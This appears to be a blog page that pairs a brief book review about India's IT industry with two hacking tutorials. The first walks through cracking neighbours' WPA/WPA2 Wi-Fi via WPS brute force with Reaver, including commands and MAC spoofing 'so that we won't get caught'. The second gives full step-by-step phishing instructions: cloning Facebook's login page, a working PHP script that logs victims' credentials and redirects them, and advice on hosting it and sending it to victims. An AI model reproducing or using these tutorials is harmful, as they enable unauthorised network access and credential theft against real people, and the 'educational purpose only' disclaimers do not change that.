Appropriately Indian: Information of India's I.T. discipline

 

I.T. field has shown a significant development in the previous decades. The I.T. professionals from India are the core part in the I.T. fanfare created around the world. Job opportunity, including India, is touching the skies in this field. The rationality of merit is so deeply embedded within the logics of the I.T. industry that it especially convinces professional I.T. women that they work in a gender equitable industry in which each woman advances according to her own merit.

It is a false myth the I.T. field is opted by the students of middle class only. In this context Smitha Radhakrishnan wrote a book- “Appropriately Indian”. Brief examples of approx. 130 people pertaining to this field have been a part explanation of this book. She tells that I.T. is one of those successful fields in the world which includes students from both, the middle class as well the upper class families.

 Why is it that I.T. field has a significant demand all over the world? Answer to this question has been given in this book. Moreover, our country is successful in creating its own image in front of the world. In this task, how I.T. sector has played a substantial role is also explained in this book. This book also tells us of How I.T. field is distinct in terms of professionalism with respect to other fields. If you wish to have a close approach to the field of Information Technology, then one may find this book helpful.

You can read the book online over Here.

You can buy imported edition of the book over Here.

You can buy the Indian edition over Here.

To read a more detailed review of this book, click Here.

Hacking WPA/WPA2 Wi-Fi Networks

Did you ever have a feeling to learn How to Hack Wi-Fi networks? Did you wish to use other people’s Wi-Fi networks but couldn’t, because you didn’t know the network key? 

If the answer to the above questions is YES, then this tutorial is for you.

The old Wi-Fi networks had WEP (Wired Equivalent Privacy). The WEP connection was easily vulnerable to password cracks. So, two new security protocols namely WPA (Wi-Fi Protected Access) and WPA 2 (Wi-Fi Protected Access II) came into effect.

But, in the world of computers, you’ll always find keys to all the locks either being formed or already would’ve been constituted. So, today we are going to learn about cracking WPA and WPA2 Wi-Fi passwords.

For this, you’ll need Hackers' favorite operating system- BackTrack. To download BackTrack and learn about its installation, go to:

http://www.backtrack-linux.org/downloads/

http://www.backtrack-linux.org/tutorials/

WPA/WPA2 password can be cracked simply by capturing WPA handshake and then applying a dictionary attack on them. If he passphrase is in the dictionary then password will be cracked, and this process may take hours, in some cases in even days. But what if password is not in dictionary?

So here we will learn to crack these passpharses

WPS :- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless home network. By default this is enabled in most of routers.

WPS has been shown to easily fall to brute-force attacks. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours and, with it, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models.

So, using Reaver we will brute force the AP's (Wireless Access Point) WPS, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.

The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually.

Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts.So here key concept is that we can brute-force that pin, and can get all the credentials kept for Access Point which can be any combination of digits, special symbols.

Let's Start :

Boot your Backtrack :

Let's we will change the mac address of our network card so that we won't get caught

airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Now run the following the command to get all the available AP's

wash -1 mon0

Now choose your target and note its bssid and issue the following command replacing <bssid> with the targets bssid:

reaver -i mon0 -b <bssid> -vv

Now wait until you Reaver brute force's the pin. Once its done, you'll have

WPS Pin
WPA PSK
AP SSID

So, Enjoy Hacking!!!

NOTE: THIS IS FOR EDUCATIONAL PURPOSE ONLY AND IN NO WAY SHOULD BE MISUSED.

Phishing Tutorial

Phishing is something which you all might be pretty aware of.

 According to wikipedia:

Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.^[1]

^{Phishing is typically carried out by e-mail spoofing[2] or instant messaging,[3] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[4] and exploits the poor usability of current web security technologies.[5] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.}

A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant of fishing,^[6] probably influenced by phreaking,^[7][8] and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.

^{Now, let's learn how carry out Phishing.}

So now, lets start demonstration of phishing with one of your favorite 

social networking website or emailing website. There are many more, and

this method will be apply to each and everyone like gmail.com, yahoo.com,

live.com, hotmail.com, facebook.com, twitter.com, flicr, mail.com, 

rediffmail.com, in.com and rest of the websites which provide these services.

For this Tutorial, I recommend you to use Firefox web browser. 

Step-1:- Register to any website hosting website. The websites which provide 

cpanel for websites are recommended. There are many web hosting websites which

 provide free website hosting services.

One such website is http://x10hosting.com

There are plenty such out there. Initiate Googleing and you'll get plenty as

such. 

Step-2:- Go to the target site. In our case, it's everyone's favourite-

 facebook.com . Then press Ctrl+U or right click the page and select 

view source. Simply copy-paste ( Ctrl+C and Ctrl +V) the given code into a 

notepad file.

Step-3:- Save the notepad file with name "index.html" in a new folder.

Step-4:- Open any editor ( in our case it's notepad) and copy-paste the code 

given below:

<?php

header ('Location: http://www.facebook.com/');

$handler = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, "=");
fwrite($handler, $value);
fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
 

exit;

?> 

Save the file containing the above code with "anyname.php". Here, we'll 

save it with name "login.php". But, make sure that the file is saved with

.php extension as the given code is a php code. In this code, in line

$handler = .... there's a word in inverted commas i.e "log.txt". Change it

to any unguessable name. Like asertf1324.txt. But, here we'll keep the name

login.txt unedited for the sake of convenience. 

Step-5:- Regarding file previously saved file i.e "index.html", open it using

notepad. Press Ctrl+F (for find) and search word "action" in the page of code.

Here, you'll see a line similar to action="https://facebook.....". Remove the

whole line which is under the quotes and replace it with "login.php" (change it

to the unguessable name decided previously). Save and exit.

Step-6:- Upload both the files i.e "index.html" and "login.php" in the manager

directory of your control panel.

(Looks and method of upload may vary depending on your website host)

Step-7:- Open your sub-domain, the one you had chosen while registration.

Eg- yourname.x10hosting.com. You'll see the fake login page of the website.

(In our case- facebook.com). Send the link to your friend/victim. Once he/she

enters his/her username and password it will be stored in login.txt file.

AND Do you know the beauty of this code? The beauty is that the victim after

entering his/her username and password will be directed to the Original 

facebook page. So, the victim will, in no way have an inkling of doubt. 

If you are making the phishing page other than facebook.com, replace 

header ('Location: http://www.facebook.com/') to

header ('Location: othersite.com').

Step-8:- Now go to yoursite.x10hosting.com/log.txt and you'll find the username

and password of the victim.

NOTE: Sometimes x10hosting doesn't support phishing. Use another free website

provider in that case.

DISCLAIMER: THIS IS FOR EDUCATIONAL PURPOSE ONLY AND IN NO WAY SHOULD BE MISUSED.